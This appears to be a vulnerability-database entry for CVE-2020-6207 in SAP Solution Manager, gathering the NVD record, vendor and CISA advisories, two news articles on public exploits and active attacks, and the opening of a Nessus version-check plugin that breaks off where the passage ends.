DATABASE RESOURCES PRICING ABOUT US

{"id": "CVE-2020-6207", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2020-6207", "description": "SAP Solution Manager (User Experience Monitoring), version- 7.2, due to Missing Authentication Check does not perform any authentication for a service resulting in complete compromise of all SMDAgents connected to the Solution Manager.", "published": "2020-03-10T21:15:00", "modified": "2021-06-17T14:30:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-6207", "reporter": "cna@sap.com", "references": ["https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=540935305", "https://launchpad.support.sap.com/#/notes/2890213", "http://packetstormsecurity.com/files/161993/SAP-Solution-Manager-7.2-Remote-Command-Execution.html", "http://seclists.org/fulldisclosure/2021/Apr/4", "http://packetstormsecurity.com/files/162083/SAP-SMD-Agent-Unauthenticated-Remote-Code-Execution.html", "http://seclists.org/fulldisclosure/2021/Jun/34", "http://packetstormsecurity.com/files/163168/SAP-Solution-Manager-7.20-Missing-Authorization.html"], "cvelist": ["CVE-2020-6207"], "immutableFields": [], "lastseen": "2022-03-23T18:47:14", "viewCount": 526, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:56C88ED5-2508-415E-962F-DE1CDBF69D5B"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-3293"]}, {"type": "githubexploit", "idList": ["B603AF38-7E85-5B62-8806-5E004DA884C8"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY-ADMIN-SAP-CVE_2020_6207_SOLMAN_RCE-", "MSF:EXPLOIT-MULTI-SAP-CVE_2020_6207_SOLMAN_RS-"]}, {"type": "nessus", "idList": ["SAP_SOLUTION_MANAGER_2890213.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:161993"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:5109AC30126DB59333F13ED32F7F4713", "RAPID7BLOG:5469B2F04F34A9BFD78A364ECC4F941F", "RAPID7BLOG:764CA6BDCBE5F8F001B5E508AE0659CC"]}, {"type": "thn", "idList": ["THN:3C21F3359B50A4527A83BD7E63B731B2", "THN:A7AA3AE7A696436A10F01A7B17DFFA4E"]}, {"type": "threatpost", "idList": ["THREATPOST:4CFA3A7AC21D83FC03B1B74B2DA261BD"]}, {"type": "zdt", "idList": ["1337DAY-ID-36039"]}]}, "score": {"value": 2.7, "vector": "NONE"}, "twitter": {"counter": 70, "modified": "2021-04-07T09:33:08", "tweets": [{"link": "https://twitter.com/rimpq/status/1380136604254232583", "text": "Couple of new /hashtag/SIGMA?src=hashtag_click rules to cover exploitation of CVE-2020-6287 / /hashtag/CVE?src=hashtag_click-2020-6207 SAP /hashtag/vulnerabilities?src=hashtag_click. (processes behaviour / /hashtag/SAP?src=hashtag_click audit events based). Available on /hashtag/TDM?src=hashtag_click.\n\n[Ref]: https://t.co/ggddxOezYB?amp=1\n[RULES]: https://t.co/OXw4VMSTc0?amp=1\n/hashtag/threathunting?src=hashtag_click /hashtag/SOC?src=hashtag_click /hashtag/blueteam?src=hashtag_click"}, {"link": "https://twitter.com/ipssignatures/status/1384009387228815364", "text": "I know 3 other IPSs that have protections/signatures/rules for the vulnerability CVE-2020-6207.\nhttps://t.co/nNoBtXbQ0v?amp=1\n/hashtag/Spwfxmmv2ni7gm?src=hashtag_click"}, {"link": "https://twitter.com/ipssignatures/status/1384009386314506249", "text": "It's new to me that Hillstone has a protection/signature/rule for the vulnerability CVE-2020-6207.\nhttps://t.co/7UxfWNMjpd?amp=1\n/search?src=sprv&q=CVE-2020-6207\nThe vuln was published 404 days ago by NIST.\n/hashtag/Spwfxmmv2ni7gm?src=hashtag_click"}, {"link": "https://twitter.com/cyberprotectgrp/status/1379826560287580162", "text": "\"The attacks are brute-forcing high-privilege SAP user accounts, as well as exploiting a raft of known bugs: CVE-2020-6287, CVE-2020-6207, CVE-2018-2380, CVE-2016-9563, CVE-2016-3976 and CVE-2010-5326\" /hashtag/infosec?src=hashtag_click /hashtag/CyberSecurity?src=hashtag_click"}, {"link": "https://twitter.com/ipssignatures/status/1365829573812838400", "text": "I know one more IPS that has a protection/signature/rule for the vulnerability CVE-2020-6207.\nhttps://t.co/nNoBtXtrp5?amp=1\n/hashtag/Spwfxmmv2ni7gm?src=hashtag_click"}, {"link": "https://twitter.com/ipssignatures/status/1365829573196320769", "text": "It's new to me that Astaro has a protection/signature/rule for the vulnerability CVE-2020-6207.\nhttps://t.co/3vatrWyN8G?amp=1\n/search?src=sprv&q=CVE-2020-6207\nThe vuln was published 354 days ago by NIST.\n/hashtag/Spwfxmmv2ni7gm?src=hashtag_click"}, {"link": "https://twitter.com/ipssignatures/status/1373953100696944642", "text": "It's new to me that CheckPoint has a protection/signature/rule for the vulnerability CVE-2020-6207.\nhttps://t.co/o3qYWVCe2A?amp=1\n/search?src=sprv&q=CVE-2020-6207\nThe vuln was published 376 days ago by NIST.\n/hashtag/Spwfxmmv2ni7gm?src=hashtag_click"}, {"link": "https://twitter.com/blueteamsec1/status/1383029667502845966", "text": "[PDF] ONAPSIS: Active Cyberattacks on Mission-Critical SAP Applications - CVE-2020-6287, CVE-2020-6207, CVE-2018-2380, CVE-2016-9563, CVE-2016-3976 and CVE-2010-5326 https://t.co/XfCxK9iohL?amp=1 /hashtag/security?src=hashtag_click /hashtag/threathunting?src=hashtag_click /hashtag/infosec?src=hashtag_click"}, {"link": "https://twitter.com/cipherstorm/status/1375460792921772038", "text": "SAP Solution Manager 7.2 Remote Command Execution: This Metasploit module exploits the CVE-2020-6207 vulnerability within the SAP EEM servlet of SAP Solution Manager (SolMan) running version 7.2. The vulnerability occurs due to missing authentication\u2026 https://t.co/RAKV1RV87g?amp=1"}, {"link": "https://twitter.com/motakasoft/status/1354995201308168201", "text": "GitHub Trending Archive, 27 Jan 2021, Python. chipik/SAP_EEM_CVE-2020-6207, darrenmartyn/VisualDoor, ahmedkhlief/APT-Hunter, MTK-bypass/bypass_utility, Chia-Network/chia-blockchain, nicksawhney/bernie-sits, AdamGold/Dryvo, demisto/content https://t.co/APG71IhNaV?amp=1"}]}, "exploitation": {"wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:56C88ED5-2508-415E-962F-DE1CDBF69D5B"]}], "wildExploited": true}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:56C88ED5-2508-415E-962F-DE1CDBF69D5B"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-3293"]}, {"type": "githubexploit", "idList": ["B603AF38-7E85-5B62-8806-5E004DA884C8"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SAP/CVE_2020_6207_SOLMAN_RCE/", "MSF:EXPLOIT/MULTI/SAP/CVE_2020_6207_SOLMAN_RS/"]}, {"type": "nessus", "idList": ["SAP_SOLUTION_MANAGER_2890213.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:161993"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:5469B2F04F34A9BFD78A364ECC4F941F", "RAPID7BLOG:764CA6BDCBE5F8F001B5E508AE0659CC"]}, {"type": "talos", "idList": ["SAP"]}, {"type": "thn", "idList": ["THN:A7AA3AE7A696436A10F01A7B17DFFA4E"]}, {"type": "zdt", "idList": ["1337DAY-ID-36039"]}]}, "vulnersScore": 2.7}, "_state": {"wildexploited": 0, "dependencies": 1660004461, "score": 1659875307, "cisa_kev_wildexploited": 1660152412}, "_internal": {"score_hash": "0785d94a638f3c49d7a3a8a2c5f2b88e"}, "cna_cvss": {"cna": "SAP SE", "cvss": {"3": {"vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "score": 10.0}}}, "cpe": ["cpe:/a:sap:solution_manager:7.20"], "cpe23": ["cpe:2.3:a:sap:solution_manager:7.20:*:*:*:*:*:*:*"], "cwe": ["CWE-306"], "affectedSoftware": [{"cpeName": "sap:solution_manager", "version": "7.20", "operator": "eq", "name": "sap solution manager"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:sap:solution_manager:7.20:*:*:*:*:*:*:*", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=540935305", "name": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=540935305", "refsource": "MISC", "tags": ["Vendor Advisory"]}, {"url": "https://launchpad.support.sap.com/#/notes/2890213", "name": "https://launchpad.support.sap.com/#/notes/2890213", "refsource": "MISC", "tags": ["Permissions Required", "Vendor Advisory"]}, {"url": "http://packetstormsecurity.com/files/161993/SAP-Solution-Manager-7.2-Remote-Command-Execution.html", "name": "http://packetstormsecurity.com/files/161993/SAP-Solution-Manager-7.2-Remote-Command-Execution.html", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "http://seclists.org/fulldisclosure/2021/Apr/4", "name": "20210405 Onapsis Security Advisory 2021-0001: [CVE-2020-6207] - Unauthenticated RCE in SAP all SMD Agents connected to SAP SolMan", "refsource": "FULLDISC", "tags": ["Mailing List", "Third Party Advisory"]}, {"url": "http://packetstormsecurity.com/files/162083/SAP-SMD-Agent-Unauthenticated-Remote-Code-Execution.html", "name": "http://packetstormsecurity.com/files/162083/SAP-SMD-Agent-Unauthenticated-Remote-Code-Execution.html", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "http://seclists.org/fulldisclosure/2021/Jun/34", "name": "20210614 Onapsis Security Advisory 2021-0014: Missing authorization check in SAP Solution Manager LM-SERVICE Component SP 11 PL 2", "refsource": "FULLDISC", "tags": ["Mailing List", "Third Party Advisory"]}, {"url": "http://packetstormsecurity.com/files/163168/SAP-Solution-Manager-7.20-Missing-Authorization.html", "name": "http://packetstormsecurity.com/files/163168/SAP-Solution-Manager-7.20-Missing-Authorization.html", "refsource": "MISC", "tags": ["Third Party Advisory"]}]}

{"checkpoint_advisories": [{"lastseen": "2022-02-16T19:35:11", "description": "A remote code execution vulnerability exists in SAP Solution Manager. The vulnerability is due to a lack of authentication in the User Experience Monitoring componant. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-20T00:00:00", "type": "checkpoint_advisories", "title": "SAP Solution Manager Remote Code Execution (CVE-2020-6207)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6207"], "modified": "2021-03-20T00:00:00", "id": "CPAI-2020-3293", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "SAP Solution Manager (User Experience Monitoring), version- 7.2, due to Missing Authentication Check does not perform any authentication for a service resulting in complete compromise of all SMDAgents connected to the Solution Manager.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "SAP Solution Manager Missing Authentication Check Complete Compromise of SMD Agents vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6207"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2020-6207", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-09T12:39:11", "description": "[](<https://thehackernews.com/images/-TP5Z2UvGZxw/YAvgBnM6X4I/AAAAAAAADsw/Z2AvMeqPHSowGI_r4G-7wJCVq0RpRaj1QCLcBGAsYHQ/s0/sap.jpg>)\n\nCybersecurity researchers have warned of a publicly available fully-functional exploit that could be used to target SAP enterprise software.\n\nThe exploit leverages a vulnerability, tracked as [CVE-2020-6207](<https://nvd.nist.gov/vuln/detail/CVE-2020-6207>), that stems from a missing authentication check in SAP Solution Manager (SolMan) version 7.2\n\nSAP [SolMan](<https://support.sap.com/en/alm/solution-manager.html>) is an application management and administration solution that offers end-to-end application lifecycle management in distributed environments, acting as a centralized hub for implementing and maintaining SAP systems such as ERP, CRM, HCM, SCM, BI, and others.\n\n\"A successful exploitation could allow a remote unauthenticated attacker to execute highly privileged administrative tasks in the connected [SAP SMD Agents](<https://wiki.scn.sap.com/wiki/display/SM/Solution+Manager+Diagnostics>),\" researchers from Onapsis [said](<https://onapsis.com/blog/new-sap-exploit-published-online-how-stay-secure>), referring to the Solution Manager Diagnostics toolset used to analyze and monitor SAP systems.\n\nThe vulnerability, which has the highest possible CVSS base score of 10.0, was addressed by SAP as part of its [March 2020](<https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=540935305>) updates.\n\n[](<https://thehackernews.com/images/-wZmwY_o-L-s/YAvfPXDl9iI/AAAAAAAADso/kDzPp0nPzMslP37Pivnpf5oO7ZlkncWjwCLcBGAsYHQ/s0/sap-software.jpg>)\n\nExploitation methods leveraging the flaw were later demonstrated at the [Black Hat conference](<https://www.blackhat.com/us-20/briefings/schedule/index.html#an-unauthenticated-journey-to-root-pwning-your-companys-enterprise-software-servers-19964>) last August by Onasis researchers Pablo Artuso and Yvan Genuer to highlight possible attack techniques that could be devised by rogue parties to strike SAP servers and obtain root access.\n\nThe critical flaw resided in SolMan's [User Experience Monitoring](<https://support.sap.com/en/alm/solution-manager/expert-portal/user-experience-monitoring.html>) (formerly End-user Experience Monitoring or EEM) component, thus putting every business system connected to the Solution Manager at risk of a potential compromise.\n\nThe public availability of a Proof-of-Concept (PoC) exploit code, therefore, leaves unpatched servers exposed to a number of potential malicious attacks, including:\n\n * Shutting down any SAP system in the landscape\n * Causing IT to control deficiencies impacting financial integrity and privacy, leading to regulatory compliance violations\n * Deleting any data in the SAP systems, causing business disruptions\n * Assigning superuser privileges to any existing or new user, allowing those users to run critical operations, and\n * Reading sensitive data from the database\n\n\"While exploits are released regularly online, this hasn't been the case for SAP vulnerabilities, for which publicly available exploits have been limited,\" Onapsis researchers said.\n\n\"The release of a public exploit significantly increases the chance of an attack attempt since it also expands potential attackers not only to SAP-experts or professionals, but also to script-kiddies or less-experienced attackers that can now leverage public tools instead of creating their own.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-23T08:43:00", "type": "thn", "title": "Beware! Fully-Functional Exploit Released Online for SAP Solution Manager Flaw", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6207"], "modified": "2021-04-09T07:57:45", "id": "THN:A7AA3AE7A696436A10F01A7B17DFFA4E", "href": "https://thehackernews.com/2021/01/beware-fully-functional-released-online.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:23", "description": "[](<https://thehackernews.com/images/-dxgYH4aIuuw/YGxlNUtGVCI/AAAAAAAACLs/oKpHnFXRhZwabJSwosFF7e-iA0QdpeyNgCLcBGAsYHQ/s0/sap.jpg>)\n\nCyber attackers are actively setting their sights on unsecured SAP applications in an attempt to steal information and sabotage critical processes, according to new research.\n\n\"Observed exploitation could lead in many cases to full control of the unsecured SAP application, bypassing common security and compliance controls, and enabling attackers to steal sensitive information, perform financial fraud or disrupt mission-critical business processes by deploying ransomware or stopping operations,\" cybersecurity firm Onapsis and SAP [said](<https://onapsis.com/active-cyberattacks-mission-critical-sap-applications>) in a joint report published today.\n\nThe Boston-based company said it detected over 300 successful exploitations out of a total of 1,500 attempts targeting previously known vulnerabilities and insecure configurations specific to SAP systems between mid-2020 to March 2021, with multiple brute-force attempts made by adversaries aimed at high-privilege SAP accounts as well as chaining together several flaws to strike SAP applications.\n\nApplications that have been targeted include, but not limited to enterprise resource planning (ERP), supply chain management (SCM), human capital management (HCM), product lifecycle management (PLM), customer relationship management (CRM), and others.\n\nTroublingly, Onapsis report outlines weaponization of SAP vulnerabilities in less than 72 hours from the release of patches, with new unprotected SAP applications provisioned in cloud environments being discovered and compromised in less than 3 hours.\n\nIn one case, a day after SAP issued a patch for [CVE-2020-6287](<https://us-cert.cisa.gov/ncas/alerts/aa20-195a>) (more below) on July 14, 2020, a proof-of-concept exploit emerged in the wild, which was followed by mass scanning activity on July 16 and the release of a fully-functional public exploit on July 17, 2020.\n\nThe attack vectors were no less sophisticated. The adversaries were found to adopt a varied set of techniques, tools, and procedures to gain initial access, escalate privileges, drop web shells for arbitrary command execution, create SAP administrator users with high privileges, and even extract database credentials. The attacks themselves were launched with the help of TOR nodes and distributed virtual private servers (VPS).\n\n[](<https://thehackernews.com/images/-thOJEuCUSH4/YGxjK5MJGmI/AAAAAAAACLk/k5kYRCll1SYAktNePrl_GDL-cUcYgfNswCLcBGAsYHQ/s0/cyberattack.jpg>)\n\nThe six flaws exploited by threat actors include \u2014\n\n * [**CVE-2010-5326**](<https://nvd.nist.gov/vuln/detail/CVE-2010-5326>) (CVSS score: 10) - Remote code execution flaw in SAP NetWeaver Application Server (AS) Java\n * [**CVE-2016-3976**](<https://nvd.nist.gov/vuln/detail/CVE-2016-3976>) (CVSS score: 7.5) - Directory traversal vulnerability in SAP NetWeaver AS Java\n * [**CVE-2016-9563**](<https://nvd.nist.gov/vuln/detail/CVE-2016-9563>) (CVSS score: 6.4) - XML External Entity ([XXE](<https://www.acunetix.com/blog/articles/xml-external-entity-xxe-vulnerabilities/>)) expansion vulnerability in BC-BMT-BPM-DSK component of SAP NetWeaver AS Java\n * [**CVE-2018-2380**](<https://nvd.nist.gov/vuln/detail/CVE-2018-2380>) (CVSS score: 6.6) - Directory traversal vulnerability in Internet Sales component in SAP CRM\n * [**CVE-2020-6207**](<https://nvd.nist.gov/vuln/detail/CVE-2020-6207>) (CVSS score: 9.8) - Missing authentication check in SAP Solution Manager\n * [**CVE-2020-6287**](<https://nvd.nist.gov/vuln/detail/CVE-2020-6287>) (CVSS score: 10) - RECON (aka Remotely Exploitable Code On NetWeaver) flaw in LM Configuration Wizard component \n\nFirst disclosed in July 2020, successful exploitation of [CVE-2020-6287](<https://thehackernews.com/2020/07/sap-netweaver-vulnerability.html>) could give an unauthenticated attacker full access to the affected SAP system, counting the \"ability to modify financial records, steal personally identifiable information (PII) from employees, customers and suppliers, corrupt data, delete or modify logs and traces and other actions that put essential business operations, cybersecurity and regulatory compliance at risk.\"\n\nOnapsis also said it was able to detect scanning activity for CVE-2020-6207 dating back to October 19, 2020, almost three months before the public release of a [fully-working exploit](<https://thehackernews.com/2021/01/beware-fully-functional-released-online.html>) on January 14, 2021, implying that threat actors had knowledge of the exploit prior to the public disclosure.\n\nFurthermore, a separate attack observed on December 9 was found to chain exploits for three of the flaws, namely CVE-2020-6287 for creating an admin user and logging in to the SAP system, CVE-2018-2380 for privilege escalation, and CVE-2016-3976 for access to high-privileged accounts and the database.\n\n\"This all happened within 90 minutes,\" Onapsis researchers noted.\n\nWhile no customer breaches have been uncovered, both SAP and Onapsis are urging businesses to perform a compromise assessment of applications, apply relevant patches, and address misconfigurations to prevent unauthorized access.\n\n\"The critical findings [...] describe attacks on vulnerabilities with patches and secure configuration guidelines available for months and even years,\" Onapsis CEO Mariano Nunez said. \"Unfortunately, too many organizations still operate with a major governance gap in terms of the cybersecurity and compliance of their mission-critical applications, allowing external and internal threat actors to access, exfiltrate and gain full control of their most sensitive and regulated information and processes.\"\n\n\"Companies that have not prioritized rapid mitigation for these known risks should consider their systems compromised and take immediate and appropriate action,\" Nunez added.\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) has also published an [alert](<https://us-cert.cisa.gov/ncas/current-activity/2021/04/06/malicious-cyber-activity-targeting-critical-sap-applications>) warning of ongoing nefarious cyber activity in the SAP threat landscape, stating that \"systems running outdated or misconfigured software are exposed to increased risks of malicious attacks.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-04-06T13:43:00", "type": "thn", "title": "Watch Out! Mission Critical SAP Applications Are Under Active Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-5326", "CVE-2016-3976", "CVE-2016-9563", "CVE-2018-2380", "CVE-2020-6207", "CVE-2020-6287"], "modified": "2021-04-07T04:31:36", "id": "THN:3C21F3359B50A4527A83BD7E63B731B2", "href": "https://thehackernews.com/2021/04/watch-out-mission-critical-sap.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2022-07-18T20:49:56", "description": "The version of SAP Solution Manager SAP on the remote host may be affected by a missing authentication vulnerability in the End user Experience Monitoring (EEM) function due to a lack of authentication checks for a service. An unauthenticated, remote attacker can exploit this issue to compromise all SMDAgents connected to the Solution Manager.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-01-28T00:00:00", "type": "nessus", "title": "SAP Solution Manager Missing Authentication (2890213)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-6207"], "modified": "2022-01-21T00:00:00", "cpe": ["cpe:/a:sap:netweaver_solution_manager"], "id": "SAP_SOLUTION_MANAGER_2890213.NASL", "href": "https://www.tenable.com/plugins/nessus/145532", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(145532);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/21\");\n\n script_cve_id(\"CVE-2020-6207\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"SAP Solution Manager Missing Authentication (2890213)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SAP Solution Manager may be affected by a missing authentication vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of SAP Solution Manager SAP on the remote host may be affected by a missing authentication vulnerability \nin the End user Experience Monitoring (EEM) function due to a lack of authentication checks for a service. An\nunauthenticated, remote attacker can exploit this issue to compromise all SMDAgents connected to the Solution Manager.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version \nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://launchpad.support.sap.com/#/notes/2890213\");\n script_set_attribute(attribute:\"see_also\", value:\"https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=540935305\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-6207\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SAP Solution Manager remote unauthorized OS commands execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/03/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/28\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:sap:netweaver_solution_manager\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"sap_solution_manager_web_detect.nbin\");\n script_require_keys(\"Settings/ParanoidReport\", \"installed_sw/SAP Solution Manager\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\napp_name = 'SAP Solution Manager';\napp_info = vcf::get_app_info(app:app_name);\n\n# 